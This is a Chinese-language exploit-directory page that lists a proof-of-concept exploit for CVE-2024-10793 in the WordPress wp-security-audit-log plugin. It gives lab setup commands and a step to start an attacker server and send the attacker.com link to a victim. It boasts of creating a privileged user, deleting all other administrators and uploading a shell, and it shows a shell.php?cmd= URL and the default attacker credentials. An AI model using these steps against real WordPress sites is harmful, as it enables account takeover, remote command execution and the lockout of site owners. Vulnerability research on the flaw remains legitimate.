Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-10793 — 针对 CVE-2024-10793 的概念验证漏洞利用,目标为 WordPress 的 wp-security-audit-log 插件。演示了通过精心构造的 HTTP 请求实现账户接管、创建特权用户、上传 Shell 以及操纵管理员权限。 | Kitploit
工具/GitHubGitHub/mahajian/cve-2024-10793
权限提升漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用Payload 开发
GitHubmahajian/cve-2024-10793

CVE-2024-10793

针对 CVE-2024-10793 的概念验证漏洞利用,目标为 WordPress 的 wp-security-audit-log 插件。演示了通过精心构造的 HTTP 请求实现账户接管、创建特权用户、上传 Shell 以及操纵管理员权限。

查看仓库
2181年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-10793 PoC

将以下行添加到你的 hosts 文件中:

127.0.0.1  goodcms.lab
127.0.0.1  attacker.com

使用 Docker 启动 Wordpress:

$ sudo systemctl start docker
$ sudo docker-compose up -d

打开 http://goodcms.lab:2121 并执行 wordpress 的安装步骤。 在 wordpress 中安装 wp-security-audit-log.5.2.1 或更旧版本。

启动攻击者服务器:

$ php -S 0:9091 -t ./exploit

将 http://attacker.com 发送给受害者,搞定!

漏洞利用的影响:

  • 添加特权用户。
  • 修改当前管理员配置文件
  • 删除除黑客之外的所有管理员 :)
  • Shell 上传
  • 注销

alt text

账户接管与创建特权用户 Poc: 漏洞利用后的攻击者凭据:{ email: [email protected], username: amin, password: 123456 }(你可以从 xpl.js 代码中进行修改。)

运行 Shell 命令: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id

alt text

下载工具